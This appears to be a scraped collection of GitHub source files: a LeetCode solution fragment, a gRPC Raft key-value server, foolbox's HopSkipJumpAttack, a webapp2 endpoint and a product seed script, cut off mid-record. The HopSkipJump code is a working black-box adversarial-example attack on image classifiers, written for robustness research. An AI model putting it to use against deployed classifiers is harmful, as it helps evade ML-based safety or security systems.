matrix[i][0] == '1':\n dp[i][0] = 1\n for i in range(width):\n if matrix[0][i] == '1':\n dp[0][i] = 1\n for i in range(1, height):\n for j in range(1, width):\n if matrix[i][j] == '0':\n continue\n if dp[i-1][j] == dp[i][j-1]:\n if matrix[i-dp[i-1][j]][j-dp[i-1][j]] == '1':\n dp[i][j] = dp[i-1][j] + 1\n else:\n dp[i][j] = dp[i-1][j]\n else:\n dp[i][j] = min(dp[i-1][j], dp[i][j-1]) + 1\n tmp = [max(x) for x in dp]\n return max(tmp) ** 2\n\n# @lc code=end\n\n\nif __name__ == \"__main__\":\n Solution().maximalSquare([[\"1\", \"0\", \"1\", \"0\", \"0\"], [\"1\", \"0\", \"1\", \"1\", \"1\"], [\n \"1\", \"1\", \"1\", \"1\", \"1\"], [\"1\", \"0\", \"0\", \"1\", \"0\"]])\n","repo_name":"cuyu/leetcode","sub_path":"221.最大正方形.py","file_name":"221.最大正方形.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1743712239","text":"from enum import Enum\nimport sys\nimport random\nimport concurrent.futures\nimport threading\nimport time\nfrom typing import Dict, List, Optional\n\nimport grpc\n\nimport raft_pb2_grpc as pb2_grpc\nimport raft_pb2 as pb2\n\n\n[HEARTBEAT_DURATION, ELECTION_DURATION_FROM, ELECTION_DURATION_TO] = [x for x in [50, 150, 300]]\n\n\nclass ServerType(Enum):\n FOLLOWER = \"follower\"\n CANDIDATE = \"candidate\"\n LEADER = \"leader\"\n\n\nclass Node:\n def __init__(self, id: int, host: str, port: int, stub: Optional[pb2_grpc.RaftNodeStub]):\n self.id = id\n self.host = host\n self.port = port\n self.stub = stub\n\n # exclusively for the leader\n self.next_index = 0\n self.match_index = -1\n\n\n# Log entity\nclass Log:\n def __init__(self, index: int, term_number: int, command: str):\n self.index = index\n self.term_number = term_number\n self.command = command\n\n\n# Internal state of the leader\nclass State:\n def __init__(self, id: int, nodes: Dict[int, Node], debug: bool = False):\n self.id = id\n self.type: ServerType = ServerType.FOLLOWER\n self.term: int = 
0\n self.leader_id: int = -1\n\n self.storage: Dict[str, str] = {}\n self.logs: List[Log] = []\n self.temp_logs: List[Log] = []\n\n self.commit_index: int = -1\n self.last_applied: int = -1\n\n self.is_suspended = False\n self.is_terminating = False\n self.state_lock = threading.Lock()\n self.election_timer_fired = threading.Event()\n self.heartbeat_events: Dict[int, threading.Event] = {}\n self.debug = debug\n\n self.election_campaign_timer: Optional[threading.Timer] = None\n self.election_timeout: float = -1\n self.nodes = nodes # dictionary id : Node\n self.vote_count: int = 0\n self.voted_for_id: int = -1\n\n\ndef get_last_log() -> Log:\n global STATE\n\n last_log = Log(-1, -1, \"\")\n if len(STATE.logs) > 0:\n last_log = STATE.logs[-1]\n return last_log\n\n\ndef exit_with_error(error_msg: str):\n print(f\"\\nERROR: {error_msg}\")\n sys.exit()\n\n\n# Election timer function\ndef select_election_timeout():\n global ELECTION_DURATION_FROM, ELECTION_DURATION_TO\n\n return random.randrange(ELECTION_DURATION_FROM, ELECTION_DURATION_TO) * 0.001\n\n\ndef reset_election_campaign_timer():\n global STATE\n\n stop_election_campaign_timer()\n STATE.election_campaign_timer = threading.Timer(STATE.election_timeout, STATE.election_timer_fired.set)\n STATE.election_campaign_timer.start()\n\n\ndef select_new_election_timeout_duration():\n global STATE\n\n STATE.election_timeout = select_election_timeout()\n\n\ndef stop_election_campaign_timer():\n global STATE\n\n if STATE.election_campaign_timer:\n STATE.election_campaign_timer.cancel()\n\n\n# Elections\ndef start_election():\n global STATE\n\n with STATE.state_lock:\n if STATE.is_terminating:\n return\n\n print(\"The leader is dead\")\n STATE.type = ServerType.CANDIDATE\n STATE.leader_id = -1\n STATE.term += 1\n\n # vote for ourselves\n STATE.vote_count = 1\n STATE.voted_for_id = STATE.id\n\n print(f\"I am a candidate. 
Term: {STATE.term}\")\n for id in STATE.nodes.keys():\n if id != STATE.id:\n t = threading.Thread(target=request_vote_worker_thread, args=(id,))\n t.start()\n\n # now RequestVote threads have started,\n # lets set a timer for the end of the election\n reset_election_campaign_timer()\n\n\ndef has_enough_votes():\n global STATE\n\n required_votes = (len(STATE.nodes) // 2) + 1\n return STATE.vote_count >= required_votes\n\n\ndef finalize_election():\n global STATE\n\n stop_election_campaign_timer()\n with STATE.state_lock:\n if STATE.type != ServerType.CANDIDATE:\n return\n\n if has_enough_votes():\n\n # Become a leader\n STATE.type = ServerType.LEADER\n STATE.leader_id = STATE.id\n STATE.vote_count = 0\n STATE.voted_for_id = -1\n\n start_heartbeats()\n print(\"Votes received\")\n display_type_term_info()\n return\n\n \"\"\"If election was unsuccessful\n then pick new timeout duration\"\"\"\n become_a_follower()\n select_new_election_timeout_duration()\n reset_election_campaign_timer()\n\n\ndef become_a_follower():\n global STATE\n\n if STATE.type != ServerType.FOLLOWER:\n STATE.type = ServerType.FOLLOWER\n display_type_term_info()\n STATE.voted_for_id = -1\n STATE.vote_count = 0\n\n\n# Heartbeats\ndef start_heartbeats():\n global STATE\n\n for event in STATE.heartbeat_events.values():\n event.set()\n\n\n# Thread functions\ndef request_vote_worker_thread(id_to_request):\n global STATE\n\n ensure_connected(id_to_request)\n node = STATE.nodes[id_to_request]\n\n saved_current_term = STATE.term\n\n try:\n if not node.stub:\n return\n\n with STATE.state_lock:\n saved_last_log = get_last_log()\n\n response = node.stub.RequestVote(\n pb2.VoteArgs(\n term=saved_current_term,\n candidate_id=STATE.id,\n last_log_index=saved_last_log.index,\n last_log_term=saved_last_log.term_number,\n ),\n timeout=0.1,\n )\n\n if not response.result:\n reset_election_campaign_timer()\n\n with STATE.state_lock:\n if STATE.type != ServerType.CANDIDATE or STATE.is_suspended:\n return\n\n if 
saved_current_term < response.term:\n STATE.term = response.term\n become_a_follower()\n return\n elif saved_current_term == response.term:\n STATE.vote_count += 1\n\n # got enough votes, no need to wait for the end of the timeout\n if has_enough_votes():\n finalize_election()\n\n except grpc.RpcError:\n return\n\n\ndef election_timeout_thread():\n global STATE\n\n while not STATE.is_terminating:\n if STATE.election_timer_fired.wait(timeout=0.5):\n\n STATE.election_timer_fired.clear()\n if STATE.is_suspended:\n continue\n\n # election timer just fired\n if STATE.type == ServerType.FOLLOWER:\n # node didn't receive any heartbeats on time\n # that's why it should become a candidate\n\n start_election()\n elif STATE.type == ServerType.CANDIDATE:\n # okay, election is over\n # we need to count votes\n finalize_election()\n # if somehow we got here while being a leader,\n # then do nothing\n\n\ndef update_commit_index():\n global STATE\n\n total_nodes = len(STATE.nodes)\n\n \"\"\"\n find the maximum index of the log,\n which is committed to more than a half of followers\n \"\"\"\n for i in range(STATE.commit_index + 1, len(STATE.logs)):\n log = STATE.logs[i]\n if log.term_number == STATE.term:\n match_count = 1\n for node in STATE.nodes.values():\n if node.id == STATE.id:\n continue\n if node.match_index >= i:\n match_count += 1\n if match_count * 2 > total_nodes:\n with STATE.state_lock:\n STATE.commit_index = i\n\n with STATE.state_lock:\n if STATE.commit_index > STATE.last_applied:\n for l in STATE.logs[STATE.last_applied + 1 : STATE.commit_index + 1]:\n # apply committed changes to the storage\n add_to_storage(l.command)\n STATE.last_applied = STATE.commit_index\n\n\ndef heartbeat_thread(id_to_request):\n global STATE\n\n while not STATE.is_terminating:\n try:\n if STATE.heartbeat_events[id_to_request].wait(timeout=0.150):\n STATE.heartbeat_events[id_to_request].clear()\n\n if (STATE.type != ServerType.LEADER) or STATE.is_suspended:\n continue\n\n 
ensure_connected(id_to_request)\n node = STATE.nodes[id_to_request]\n if not node.stub:\n return\n\n with STATE.state_lock:\n current_term = STATE.term\n current_commit_index = STATE.commit_index\n current_logs = STATE.logs\n\n prev_log_index = node.next_index - 1\n prev_log_term = -1\n if prev_log_index >= 0:\n prev_log_term = current_logs[prev_log_index].term_number\n\n entries = list(map(lambda x: pb2.HeartbeatArgs.Entry(**x.__dict__), current_logs[node.next_index :]))\n\n payload = pb2.HeartbeatArgs(\n term=current_term,\n leader_id=STATE.id,\n prev_log_index=prev_log_index,\n prev_log_term=prev_log_term,\n entries=entries,\n leader_commit=current_commit_index,\n )\n\n response = node.stub.AppendEntries(\n payload,\n timeout=0.050,\n )\n\n threading.Timer(HEARTBEAT_DURATION * 0.001, STATE.heartbeat_events[id_to_request].set).start()\n\n if (STATE.type != ServerType.LEADER) or STATE.is_suspended:\n continue\n\n with STATE.state_lock:\n if STATE.term < response.term:\n reset_election_campaign_timer()\n STATE.term = response.term\n become_a_follower()\n\n if response.result:\n node.next_index += len(entries)\n node.match_index = node.next_index - 1\n\n update_commit_index()\n else:\n node.next_index = max(0, node.next_index - 1)\n\n elif STATE.type == ServerType.LEADER:\n STATE.heartbeat_events[id_to_request].set()\n\n except grpc.RpcError:\n # Create new channel if something went wrong\n create_stub(id_to_request)\n continue\n\n\n# storage functions\ndef add_to_storage(command: str):\n key, value = parse_command(command)\n STATE.storage[key] = value\n\n\n# helpers that sets timers running again\n# when suspend has ended\ndef wake_up_after_suspend():\n global STATE\n\n print(\"Server is wake up now!\")\n STATE.is_suspended = False\n if STATE.type == ServerType.LEADER:\n start_heartbeats()\n else:\n reset_election_campaign_timer()\n\n\n# gRPC server handler\nclass Handler(pb2_grpc.RaftNodeServicer):\n def RequestVote(self, request, context):\n global STATE\n\n if 
STATE.is_suspended:\n return\n\n reset_election_campaign_timer()\n with STATE.state_lock:\n response = {\"result\": False, \"term\": STATE.term}\n if STATE.term < request.term:\n STATE.term = request.term\n become_a_follower()\n\n last_log = get_last_log()\n if (\n (STATE.term == request.term)\n and (STATE.voted_for_id == -1)\n and (request.last_log_index >= last_log.index)\n and not (last_log.index != -1 and request.last_log_term != last_log.term_number)\n ):\n response = {\"result\": True, \"term\": STATE.term}\n STATE.voted_for_id = request.candidate_id\n print(f\"Voted for node {STATE.voted_for_id}\")\n return pb2.ResultWithTerm(**response)\n\n def AppendEntries(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n reset_election_campaign_timer()\n\n with STATE.state_lock:\n response = {\"result\": False, \"term\": STATE.term}\n if STATE.term < request.term:\n STATE.term = request.term\n become_a_follower()\n\n if STATE.term == request.term:\n STATE.leader_id = request.leader_id\n if STATE.type != ServerType.FOLLOWER:\n become_a_follower()\n\n last_log = get_last_log()\n if request.prev_log_index == -1 or (\n request.prev_log_index < len(STATE.logs) and request.prev_log_term == last_log.term_number\n ):\n response = {\"result\": True, \"term\": STATE.term}\n log_insert_index = request.prev_log_index + 1\n new_entries_index = 0\n\n while True:\n if log_insert_index >= len(STATE.logs) or new_entries_index >= len(request.entries):\n break\n if STATE.logs[log_insert_index].term_number != request.entries[new_entries_index].term_number:\n break\n log_insert_index += 1\n new_entries_index += 1\n\n if new_entries_index < len(request.entries):\n STATE.logs[log_insert_index:] = list(\n map(\n lambda entry: Log(entry.index, entry.term_number, entry.command),\n request.entries[new_entries_index:],\n )\n )\n\n for log in STATE.logs[log_insert_index:]:\n add_to_storage(log.command)\n\n if request.leader_commit > STATE.commit_index:\n 
STATE.commit_index = min(request.leader_commit, len(STATE.logs) - 1)\n\n return pb2.ResultWithTerm(**response)\n\n def GetLeader(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n leader_node = STATE.nodes[STATE.leader_id]\n response = {\"leader_id\": STATE.leader_id, \"leader_addr\": f\"{leader_node.host}:{leader_node.port}\"}\n return pb2.LeaderResp(**response)\n\n def Suspend(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n STATE.is_suspended = True\n print(\"Server is sleeping...\")\n threading.Timer(request.duration, wake_up_after_suspend).start()\n return pb2.Empty()\n\n def GetVal(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n value = STATE.storage.get(request.key, None)\n return pb2.ResultWithVal(**{\"result\": value != None, \"value\": value or \"\"})\n\n def SetVal(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n if STATE.type == ServerType.LEADER:\n with STATE.state_lock:\n last_log = get_last_log()\n current_last_log_index = last_log.index + 1\n STATE.logs.append(Log(current_last_log_index, STATE.term, f\"{request.key} {request.value}\"))\n\n return pb2.Result(**{\"result\": True})\n\n if STATE.type == ServerType.CANDIDATE or STATE.leader_id == -1:\n return pb2.Result(**{\"result\": False})\n\n leader_node = STATE.nodes[STATE.leader_id]\n\n try:\n ensure_connected(STATE.leader_id)\n if not leader_node.stub:\n raise grpc.RpcError()\n\n response = leader_node.stub.SetVal(request, timeout=2)\n\n except grpc.RpcError:\n return pb2.Result(**{\"result\": False})\n\n return pb2.Result(**{\"result\": response.result})\n\n\ndef create_stub(id):\n node = STATE.nodes[id]\n channel = grpc.insecure_channel(f\"{node.host}:{node.port}\")\n node.stub = pb2_grpc.RaftNodeStub(channel)\n\n\ndef ensure_connected(id):\n global STATE\n\n if id == STATE.id:\n raise BaseException(\"Shouldn't try to connect to itself\")\n\n node = STATE.nodes[id]\n if not 
node.stub:\n create_stub(id)\n\n\ndef start_server():\n global STATE\n\n self_node = STATE.nodes[STATE.id]\n server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=10))\n pb2_grpc.add_RaftNodeServicer_to_server(Handler(), server)\n server.add_insecure_port(f\"{self_node.host}:{self_node.port}\")\n server.start()\n return server\n\n\ndef get_cmd_args():\n try:\n id = int(sys.argv[1])\n except:\n exit_with_error(\"Expected one cmd argument: \")\n return id\n\n\ndef read_nodes(config_path: str) -> Dict[int, Node]:\n nodes = {}\n with open(config_path, \"r\") as f:\n parts = list(map(lambda line: line.split(), f.readlines()))\n\n for part in parts:\n nodes[int(part[0])] = Node(int(part[0]), part[1], int(part[2]), None)\n\n return nodes\n\n\ndef display_type_term_info():\n global STATE\n\n print(f\"I am a {STATE.type.value}. Term: {STATE.term}\")\n\n\ndef parse_command(command: str):\n parts = command.strip().split()\n return parts[0], \" \".join(parts[1:])\n\n\nif __name__ == \"__main__\":\n\n id = get_cmd_args()\n nodes = read_nodes(\"config.conf\")\n STATE = State(id, nodes, True)\n\n heartbeat_events: Dict[int, threading.Event] = {}\n\n election_thread = threading.Thread(target=election_timeout_thread)\n election_thread.start()\n\n for node in STATE.nodes.values():\n if STATE.id != node.id:\n heartbeat_events[node.id] = threading.Event()\n\n STATE.heartbeat_events = heartbeat_events\n\n heartbeat_threads = []\n for node in STATE.nodes.values():\n if STATE.id != node.id:\n t = threading.Thread(target=heartbeat_thread, args=(node.id,))\n t.start()\n heartbeat_threads.append(t)\n\n server = start_server()\n\n self_node = STATE.nodes[STATE.id]\n print(f\"The server starts at {self_node.host}:{self_node.port}\")\n\n display_type_term_info()\n select_new_election_timeout_duration()\n reset_election_campaign_timer()\n\n try:\n server.wait_for_termination()\n except KeyboardInterrupt:\n with STATE.state_lock:\n STATE.is_terminating = True\n\n 
server.stop(0)\n print(\"\\nShutting down\")\n\n # Close threads\n election_thread.join()\n [t.join() for t in heartbeat_threads]\n","repo_name":"Kadaverciant/Distributed-and-Network-Programming","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":18213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72824328680","text":"import logging\nfrom typing import Union, Any, Optional, Callable, List\nfrom typing_extensions import Literal\n\nimport math\n\nimport eagerpy as ep\nimport numpy as np\n\nfrom foolbox.attacks import LinearSearchBlendedUniformNoiseAttack\nfrom foolbox.tensorboard import TensorBoard\nfrom ..models import Model\n\nfrom ..criteria import Criterion\n\nfrom ..distances import l1\n\nfrom ..devutils import atleast_kd, flatten\n\nfrom .base import MinimizationAttack, get_is_adversarial\nfrom .base import get_criterion\nfrom .base import T\nfrom .base import raise_if_kwargs\nfrom .base import verify_input_bounds\nfrom ..distances import l2, linf\n\n\nclass HopSkipJumpAttack(MinimizationAttack):\n \"\"\"A powerful adversarial attack that requires neither gradients\n nor probabilities [#Chen19].\n\n Args:\n init_attack : Attack to use to find a starting points. Defaults to\n LinearSearchBlendedUniformNoiseAttack. Only used if starting_points is None.\n steps : Number of optimization steps within each binary search step.\n initial_gradient_eval_steps: Initial number of evaluations for gradient estimation.\n Larger initial_num_evals increases time efficiency, but\n may decrease query efficiency.\n max_gradient_eval_steps : Maximum number of evaluations for gradient estimation.\n stepsize_search : How to search for stepsize; choices are 'geometric_progression',\n 'grid_search'. 'geometric progression' initializes the stepsize\n by ||x_t - x||_p / sqrt(iteration), and keep decreasing by half\n until reaching the target side of the boundary. 
'grid_search'\n chooses the optimal epsilon over a grid, in the scale of\n ||x_t - x||_p.\n gamma : The binary search threshold theta is gamma / d^1.5 for\n l2 attack and gamma / d^2 for linf attack.\n tensorboard : The log directory for TensorBoard summaries. If False, TensorBoard\n summaries will be disabled (default). If None, the logdir will be\n runs/CURRENT_DATETIME_HOSTNAME.\n constraint : Norm to minimize, either \"l2\" or \"linf\"\n\n References:\n .. [#Chen19] Jianbo Chen, Michael I. Jordan, Martin J. Wainwright,\n \"HopSkipJumpAttack: A Query-Efficient Decision-Based Attack\",\n https://arxiv.org/abs/1904.02144\n \"\"\"\n\n distance = l1\n\n def __init__(\n self,\n init_attack: Optional[MinimizationAttack] = None,\n steps: int = 64,\n initial_gradient_eval_steps: int = 100,\n max_gradient_eval_steps: int = 10000,\n stepsize_search: Union[\n Literal[\"geometric_progression\"], Literal[\"grid_search\"]\n ] = \"geometric_progression\",\n gamma: float = 1.0,\n tensorboard: Union[Literal[False], None, str] = False,\n constraint: Union[Literal[\"linf\"], Literal[\"l2\"]] = \"l2\",\n ):\n if init_attack is not None and not isinstance(init_attack, MinimizationAttack):\n raise NotImplementedError\n self.init_attack = init_attack\n self.steps = steps\n self.initial_num_evals = initial_gradient_eval_steps\n self.max_num_evals = max_gradient_eval_steps\n self.stepsize_search = stepsize_search\n self.gamma = gamma\n self.tensorboard = tensorboard\n self.constraint = constraint\n\n assert constraint in (\"l2\", \"linf\")\n if constraint == \"l2\":\n self.distance = l2\n else:\n self.distance = linf\n\n def run(\n self,\n model: Model,\n inputs: T,\n criterion: Union[Criterion, T],\n *,\n early_stop: Optional[float] = None,\n starting_points: Optional[T] = None,\n **kwargs: Any,\n ) -> T:\n raise_if_kwargs(kwargs)\n originals, restore_type = ep.astensor_(inputs)\n del inputs, kwargs\n\n verify_input_bounds(originals, model)\n\n criterion = get_criterion(criterion)\n 
is_adversarial = get_is_adversarial(criterion, model)\n\n if starting_points is None:\n init_attack: MinimizationAttack\n if self.init_attack is None:\n init_attack = LinearSearchBlendedUniformNoiseAttack(steps=50)\n logging.info(\n f\"Neither starting_points nor init_attack given. Falling\"\n f\" back to {init_attack!r} for initialization.\"\n )\n else:\n init_attack = self.init_attack\n # TODO: use call and support all types of attacks (once early_stop is\n # possible in __call__)\n x_advs = init_attack.run(model, originals, criterion, early_stop=early_stop)\n else:\n x_advs = ep.astensor(starting_points)\n\n is_adv = is_adversarial(x_advs)\n if not is_adv.all():\n failed = is_adv.logical_not().float32().sum()\n if starting_points is None:\n raise ValueError(\n f\"init_attack failed for {failed} of {len(is_adv)} inputs\"\n )\n else:\n raise ValueError(\n f\"{failed} of {len(is_adv)} starting_points are not adversarial\"\n )\n del starting_points\n\n tb = TensorBoard(logdir=self.tensorboard)\n\n # Project the initialization to the boundary.\n x_advs = self._binary_search(is_adversarial, originals, x_advs)\n\n assert ep.all(is_adversarial(x_advs))\n\n distances = self.distance(originals, x_advs)\n\n for step in range(self.steps):\n delta = self.select_delta(originals, distances, step)\n\n # Choose number of gradient estimation steps.\n num_gradient_estimation_steps = int(\n min([self.initial_num_evals * math.sqrt(step + 1), self.max_num_evals])\n )\n\n gradients = self.approximate_gradients(\n is_adversarial, x_advs, num_gradient_estimation_steps, delta\n )\n\n if self.constraint == \"linf\":\n update = ep.sign(gradients)\n else:\n update = gradients\n\n if self.stepsize_search == \"geometric_progression\":\n # find step size.\n epsilons = distances / math.sqrt(step + 1)\n\n while True:\n x_advs_proposals = ep.clip(\n x_advs + atleast_kd(epsilons, x_advs.ndim) * update, 0, 1\n )\n success = is_adversarial(x_advs_proposals)\n epsilons = ep.where(success, epsilons, 
epsilons / 2.0)\n\n if ep.all(success):\n break\n\n # Update the sample.\n x_advs = ep.clip(\n x_advs + atleast_kd(epsilons, update.ndim) * update, 0, 1\n )\n\n assert ep.all(is_adversarial(x_advs))\n\n # Binary search to return to the boundary.\n x_advs = self._binary_search(is_adversarial, originals, x_advs)\n\n assert ep.all(is_adversarial(x_advs))\n\n elif self.stepsize_search == \"grid_search\":\n # Grid search for stepsize.\n epsilons_grid = ep.expand_dims(\n ep.from_numpy(\n distances,\n np.logspace(-4, 0, num=20, endpoint=True, dtype=np.float32),\n ),\n 1,\n ) * ep.expand_dims(distances, 0)\n\n proposals_list = []\n\n for epsilons in epsilons_grid:\n x_advs_proposals = (\n x_advs + atleast_kd(epsilons, update.ndim) * update\n )\n x_advs_proposals = ep.clip(x_advs_proposals, 0, 1)\n\n mask = is_adversarial(x_advs_proposals)\n\n x_advs_proposals = self._binary_search(\n is_adversarial, originals, x_advs_proposals\n )\n\n # only use new values where initial guess was already adversarial\n x_advs_proposals = ep.where(\n atleast_kd(mask, x_advs.ndim), x_advs_proposals, x_advs\n )\n\n proposals_list.append(x_advs_proposals)\n\n proposals = ep.stack(proposals_list, 0)\n proposals_distances = self.distance(\n ep.expand_dims(originals, 0), proposals\n )\n minimal_idx = ep.argmin(proposals_distances, 0)\n\n x_advs = proposals[minimal_idx]\n\n distances = self.distance(originals, x_advs)\n\n # log stats\n tb.histogram(\"norms\", distances, step)\n\n return restore_type(x_advs)\n\n def approximate_gradients(\n self,\n is_adversarial: Callable[[ep.Tensor], ep.Tensor],\n x_advs: ep.Tensor,\n steps: int,\n delta: ep.Tensor,\n ) -> ep.Tensor:\n # (steps, bs, ...)\n noise_shape = tuple([steps] + list(x_advs.shape))\n if self.constraint == \"l2\":\n rv = ep.normal(x_advs, noise_shape)\n elif self.constraint == \"linf\":\n rv = ep.uniform(x_advs, low=-1, high=1, shape=noise_shape)\n rv /= atleast_kd(ep.norms.l2(flatten(rv, keep=1), -1), rv.ndim) + 1e-12\n\n scaled_rv = 
atleast_kd(ep.expand_dims(delta, 0), rv.ndim) * rv\n\n perturbed = ep.expand_dims(x_advs, 0) + scaled_rv\n perturbed = ep.clip(perturbed, 0, 1)\n\n rv = (perturbed - x_advs) / atleast_kd(ep.expand_dims(delta + 1e-8, 0), rv.ndim)\n\n multipliers_list: List[ep.Tensor] = []\n for step in range(steps):\n decision = is_adversarial(perturbed[step])\n multipliers_list.append(\n ep.where(\n decision,\n ep.ones(\n x_advs,\n (\n len(\n x_advs,\n )\n ),\n ),\n -ep.ones(\n x_advs,\n (\n len(\n decision,\n )\n ),\n ),\n )\n )\n # (steps, bs, ...)\n multipliers = ep.stack(multipliers_list, 0)\n\n vals = ep.where(\n ep.abs(ep.mean(multipliers, axis=0, keepdims=True)) == 1,\n multipliers,\n multipliers - ep.mean(multipliers, axis=0, keepdims=True),\n )\n grad = ep.mean(atleast_kd(vals, rv.ndim) * rv, axis=0)\n\n grad /= ep.norms.l2(atleast_kd(flatten(grad), grad.ndim)) + 1e-12\n\n return grad\n\n def _project(\n self, originals: ep.Tensor, perturbed: ep.Tensor, epsilons: ep.Tensor\n ) -> ep.Tensor:\n \"\"\"Clips the perturbations to epsilon and returns the new perturbed\n\n Args:\n originals: A batch of reference inputs.\n perturbed: A batch of perturbed inputs.\n epsilons: A batch of norm values to project to.\n Returns:\n A tensor like perturbed but with the perturbation clipped to epsilon.\n \"\"\"\n epsilons = atleast_kd(epsilons, originals.ndim)\n if self.constraint == \"linf\":\n perturbation = perturbed - originals\n\n # ep.clip does not support tensors as min/max\n clipped_perturbed = ep.where(\n perturbation > epsilons, originals + epsilons, perturbed\n )\n clipped_perturbed = ep.where(\n perturbation < -epsilons, originals - epsilons, clipped_perturbed\n )\n return clipped_perturbed\n else:\n return (1.0 - epsilons) * originals + epsilons * perturbed\n\n def _binary_search(\n self,\n is_adversarial: Callable[[ep.Tensor], ep.Tensor],\n originals: ep.Tensor,\n perturbed: ep.Tensor,\n ) -> ep.Tensor:\n # Choose upper thresholds in binary search based on constraint.\n d = 
int(np.prod(perturbed.shape[1:]))\n if self.constraint == \"linf\":\n highs = linf(originals, perturbed)\n\n # TODO: Check if the threshold is correct\n # empirically this seems to be too low\n thresholds = highs * self.gamma / (d * d)\n else:\n highs = ep.ones(perturbed, len(perturbed))\n thresholds = highs * self.gamma / (d * math.sqrt(d))\n\n lows = ep.zeros_like(highs)\n\n # use this variable to check when mids stays constant and the BS has converged\n old_mids = highs\n\n while ep.any(highs - lows > thresholds):\n mids = (lows + highs) / 2\n mids_perturbed = self._project(originals, perturbed, mids)\n is_adversarial_ = is_adversarial(mids_perturbed)\n\n highs = ep.where(is_adversarial_, mids, highs)\n lows = ep.where(is_adversarial_, lows, mids)\n\n # check of there is no more progress due to numerical imprecision\n reached_numerical_precision = (old_mids == mids).all()\n old_mids = mids\n\n if reached_numerical_precision:\n # TODO: warn user\n break\n\n res = self._project(originals, perturbed, highs)\n\n return res\n\n def select_delta(\n self, originals: ep.Tensor, distances: ep.Tensor, step: int\n ) -> ep.Tensor:\n result: ep.Tensor\n if step == 0:\n result = 0.1 * ep.ones_like(distances)\n else:\n d = int(np.prod(originals.shape[1:]))\n\n if self.constraint == \"linf\":\n theta = self.gamma / (d * d)\n result = d * theta * distances\n else:\n theta = self.gamma / (d * np.sqrt(d))\n result = np.sqrt(d) * theta * distances\n\n return result\n","repo_name":"bethgelab/foolbox","sub_path":"foolbox/attacks/hop_skip_jump.py","file_name":"hop_skip_jump.py","file_ext":"py","file_size_in_byte":13889,"program_lang":"python","lang":"en","doc_type":"code","stars":2569,"dataset":"github-code","pt":"18"} +{"seq_id":"69969637161","text":"#!/usr/bin/env python\nimport json\nimport webapp2\n\n\nclass EntriesHandler(webapp2.RequestHandler):\n def get(self):\n range_start = self.request.get('start')\n range_end = self.request.get('end')\n word = self.request.get('word')\n 
word = (word if len(word) > 0 else 'Nothing') + ' '\n\n\n result = []\n\n if len(range_start) > 0 and len(range_end) > 0:\n start = int(range_start)\n end = int(range_end)\n\n end = end if end < 500 else 500\n\n for i in range(start, end):\n result.append({'name': word + str(i)})\n\n self.response.headers['Content-Type'] = \"application/json\"\n self.response.out.write(json.dumps(result))\n\n\nclass MainHandler(webapp2.RedirectHandler):\n def get(self):\n self.response.out.write(\"Hello World\")\n\napp = webapp2.WSGIApplication([\n ('/entries', EntriesHandler)\n], debug=True)\n","repo_name":"lepenkinya/infinite-scroll-app-test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6147182890","text":"from app.models import db, Product, environment, SCHEMA\n\n\ndef seed_products():\n product1 = Product(\n owner_id=1,\n name='Slap On Bracelet',\n description='You slap it on your wrist and boom you have a not so fashionable bracelet',\n price=201.00,\n )\n\n product2 = Product(\n owner_id=2,\n name='Bluetooth Earbuds',\n description='Why would you want wires holding you back when you can just not have them',\n price=799.00\n )\n\n product3 = Product(\n owner_id=3,\n name='Fancy Watch Thing',\n description='It is a watch that will make you look like you make more money than you do',\n price=1799.00\n )\n product4 = Product(\n owner_id=4,\n name='Hold Your Cords Thing',\n description='Never worry about your friends taking your cords anymore',\n price=79.99\n )\n product5 = Product(\n owner_id=5,\n name='A Touch Screen....',\n description='It looks like you can put this in your car?... 
I dont know buy it and figure it out',\n price=2000.00\n )\n product6 = Product(\n owner_id=6,\n name='A Fancy Device Holder',\n description='It looks absurdly unnecessary, That is why you are going to buy it anyway',\n price=1699.00\n )\n product7 = Product(\n owner_id=7,\n name='Hyper Leg Warmers',\n description='They are so thin they probably will not actually warm your legs... But they look cool!',\n price=89.00\n )\n product8 = Product(\n owner_id=1,\n name='More Earbuds',\n description='These are some more bluetooth earbuds but look at the case they come in! Definitely worth more money!',\n price=999.00\n )\n product9 = Product(\n owner_id=2,\n name='Bluetooth Speaker',\n description='Everything on here might as well be bluetooth, everyone loves that stuff!',\n price=699.00\n )\n product10 = Product(\n owner_id=3,\n name='Bluetooth Knife Sharpener',\n description='This knife sharpener is legit bluetooth! Trust me bro.',\n price=1300.00\n )\n product11 = Product(\n owner_id=4,\n name='Adjustable Magnet',\n description='It looks like a selfie stick, but like, with a magnet on it?',\n price=99.99\n )\n product13 = Product(\n owner_id=7,\n name='Hat and Neck Warmer',\n description='You get both of these bad boys for a fairly reasonable price (reasonable compared to everything here). Stay warm out there party people',\n price=359.00\n )\n product12 = Product(\n owner_id=5,\n name='Stretchy Shoe Cover',\n description='Say goodbye to those nasty disposable shoe covers. There is nothing better than reusing something you stepped in!',\n price=279.00\n )\n product14 = Product(\n owner_id=7,\n name='Night Vision Glasses',\n description='These are apparently night vision glasses. 
Yeah I dont really believe it either, but the picture says they are.',\n price=779.00\n )\n product15 = Product(\n owner_id=1,\n name='Some Kinda Bracelet',\n description='This is not as cool as the slap on bracelets trust me, but if you want it there is a handy add to cart button on the right',\n price=899.00\n )\n product16 = Product(\n owner_id=2,\n name='A Tablet for Drawing',\n description='Instead of wasting a ton of paper and walls just get your kids to play with this and they wont get bored of it an hour. Trust me bro',\n price=2799.00\n )\n product17 = Product(\n owner_id=3,\n name='4 In 1 Charger',\n description='Charges 4 devices... At the same time! Crazy right? And its totally wireless (except when it needs charged).',\n price=479.00\n )\n product18 = Product(\n owner_id=4,\n name='Bluetooth Knife',\n description='Do not take the picture seriously, you will not be getting one for free. Anyway this baby is totally wireless and can connect to anyone or anything!',\n price=9.99\n )\n product19 = Product(\n owner_id=5,\n name='MP3 Player',\n description='Looks like it has that set of earbuds that hurt 